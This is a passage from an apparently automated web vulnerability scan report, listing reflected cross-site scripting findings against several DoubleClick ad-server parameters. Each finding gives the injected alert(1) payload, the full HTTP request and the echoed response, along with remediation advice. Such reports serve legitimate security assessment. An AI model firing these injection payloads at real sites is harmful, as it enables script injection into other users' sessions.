document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEc9569'-alert(1)-'6b525c8dbf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600\">
...[SNIP]...

1.17. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 417c6"-alert(1)-"e33aa584cf5 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
naAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE417c6"-alert(1)-"e33aa584cf5&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494");
var fscUrl = url;
...[SNIP]...

1.18. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7b"-alert(1)-"f629491b606 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b1f7b"-alert(1)-"f629491b606&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.19. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b71b2'-alert(1)-'c477c344b94 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
BwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073b71b2'-alert(1)-'c477c344b94&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\">
...[SNIP]...

1.20. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c9f"-alert(1)-"2dc82fe9c33 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1a1c9f"-alert(1)-"2dc82fe9c33&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600");
var fscUrl = url;
var f
...[SNIP]...

1.21. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b8cd'-alert(1)-'b5744e625cb was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
dHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=11b8cd'-alert(1)-'b5744e625cb&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\">
...[SNIP]...

1.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc7"-alert(1)-"0a30ccb0824 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQd7dc7"-alert(1)-"0a30ccb0824&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B40155600");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3026'-alert(1)-'e11fbbb3a32 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:05:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7540

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:41:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQe3026'-alert(1)-'e11fbbb3a32&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865895%3B39213494\">
...[SNIP]...

1.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c82cb"-alert(1)-"4da37f8e4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:03:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lc82cb"-alert(1)-"4da37f8e4f3&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u
...[SNIP]...

1.25. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.15

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a96'-alert(1)-'d3284128866 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.15;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5uZXImcD1sb2NtLnBwJnBvcz0xJnQ9MSZzej03Mjh4OTAmb3JkPTEyOTY3NDg4ODI3NDgmaz1iYW5rcyZsPURhbGxhcyUyQytUWLgCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtzEvGj-vfbRt8echuXOSu9F5BkBvQ&client=ca-pub-4103679352234073&adurl=;ord=1608247292? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7574

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:26:33 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
nk\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/1ef/%2a/s%3B233905726%3B1-0%3B0%3B57865895%3B3454-728/90%3B40155600/40173387/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l88a96'-alert(1)-'d3284128866&ai=BBBjKQNFKTfyRH4T2lQerzcT1D53vkP4BrYvfuyHAjbcBsOClAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQk3Mjh4OTBfYXPIAQnaAXRodHRwOi8vd3d3LmxvY2FsLmNvbS9kYXJ0Lz9hZz1UcnVlJmNzcz1iYW5u
...[SNIP]...

1.26. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

